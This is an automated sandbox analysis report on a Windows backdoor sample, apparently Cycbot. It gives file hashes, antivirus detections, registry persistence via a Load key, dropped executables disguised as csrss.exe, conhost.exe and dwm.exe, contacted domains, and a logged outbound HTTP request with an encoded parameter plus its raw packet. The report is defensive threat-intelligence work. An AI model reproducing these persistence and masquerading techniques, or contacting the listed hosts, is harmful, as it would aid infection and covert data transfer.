Analysis Date: 2014-07-02 04:18:56
MD5: 49fd0df6a35a44a1dfa25d611a5ac252
SHA1: 23bfc9b4b2d5d5008dc820b6779ca55834e7c120

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: 1af74f69d0358b1f54c046d970111d7e sha1: a9bed3c39128cd07231bed618fe1066f18cbf0f2 size: 176640
Section .rdata md5: 60a86e2461dc728ebbb9d6321204c3ac sha1: d5ab74b03871c61e49c019a1ee35dd6e945fdd59 size: 2048
Section .data md5: 2441a8f4fef93eedf8b398dc2aeafe64 sha1: e8144e01e862b8d7627797f52e5307108ca819eb size: 16896
Section .tls md5: c7469c71782551f86c26efa9c07ee837 sha1: 396cf0c0bb8158cc0db8ca1f4fd62ec757aa46b8 size: 512
Timestamp: 2005-10-31 00:56:15
Version: PrivateBuild: 1532
PEhash: ad06118c39a923890417ea1671c9398526ad8524
IMPhash: eaa39bd264c2a66f24e233881ae98ba8
AV 360 Safe: Gen:Trojan.Heur.KS.1
AV Ad-Aware: Gen:Trojan.Heur.KS.1
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.E.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-25432
AV Dr. Web: BackDoor.Gbot.18
AV Emsisoft: Gen:Trojan.Heur.KS.1
AV Eset (nod32): Win32/Kryptik.KVW
AV Fortinet: W32/FraudLoad.MK!tr
AV Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Trojan.Heur.KS.1
AV Grisoft (avg): Generic_r.FO
AV Ikarus: Trojan-Spy.Win32.Zbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Spyware.Passwords.XGen
AV Mcafee: BackDoor-EXI.gen.i
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV Norman: winpe/Cycbot.BP
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen3
AV Trend Micro: BKDR_CYCBOT.SMX
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: stellasystemsonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: zonekg.com
Winsock DNS: web20ikastaroa.wikispaces.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: wikispaces.com  Type: A  ➝ 75.126.104.177
DNS: wikispaces.com  Type: A  ➝ 208.43.192.33
DNS: web20ikastaroa.wikispaces.com  Type: A
DNS: zonekg.com  Type: A
DNS: stellasystemsonline.com  Type: A
HTTP GET: http://web20ikastaroa.wikispaces.com/file/view/Observa2.jpg/45498543/Observa2.jpg?v25=13&tq=gJ4WK%2FSUh7TFk0R8oY%2BQtMWTUj26kJH7yZVaK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 75.126.104.177:80

Raw Pcap
0x00000000 (00000)   47455420 2f66696c 652f7669 65772f4f   GET /file/view/O
0x00000010 (00016)   62736572 7661322e 6a70672f 34353439   bserva2.jpg/4549
0x00000020 (00032)   38353433 2f4f6273 65727661 322e6a70   8543/Observa2.jp
0x00000030 (00048)   673f7632 353d3133 2674713d 674a3457   g?v25=13&tq=gJ4W
0x00000040 (00064)   4b253246 53556837 54466b30 52386f59   K%2FSUh7TFk0R8oY
0x00000050 (00080)   25324251 744d5754 556a3236 6b4a4837   %2BQtMWTUj26kJH7
0x00000060 (00096)   795a5661 4b253242 25324662 78577131   yZVaK%2B%2FbxWq1
0x00000070 (00112)   53666b49 5955424d 20485454 502f312e   SfkIYUBM HTTP/1.
0x00000080 (00128)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000090 (00144)   6c6f7365 0d0a486f 73743a20 77656232   lose..Host: web2
0x000000a0 (00160)   30696b61 73746172 6f612e77 696b6973   0ikastaroa.wikis
0x000000b0 (00176)   70616365 732e636f 6d0d0a41 63636570   paces.com..Accep
0x000000c0 (00192)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000d0 (00208)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x000000e0 (00224)   0a0d0a                                ...


Strings